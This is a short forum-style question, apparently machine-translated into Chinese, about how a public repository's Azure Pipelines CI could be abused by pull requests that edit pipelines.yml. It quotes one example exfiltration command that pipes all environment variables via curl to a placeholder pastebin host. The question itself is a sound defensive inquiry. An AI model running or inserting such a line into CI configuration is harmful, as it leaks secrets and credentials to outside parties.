我有一个公共回购。随机的 GitHub 用户可以自由创建拉取请求,这很棒。
我的 CI 管道在名为 repo 的普通文件中描述pipelines.yml
(我们使用 Azure 管道)。
不幸的是,这意味着一个随机的 GitHub 用户能够通过创建一个 PR 来窃取我所有的秘密环境变量,他们在其中编辑pipelines.yml
并添加一个 bash 脚本行,例如:
export | curl -XPOST 'http://pastebin-bla/xxxx'
或者运行任意代码,一般来说。正确的?
如何验证恶意 PR 至少不会更改一些关键文件?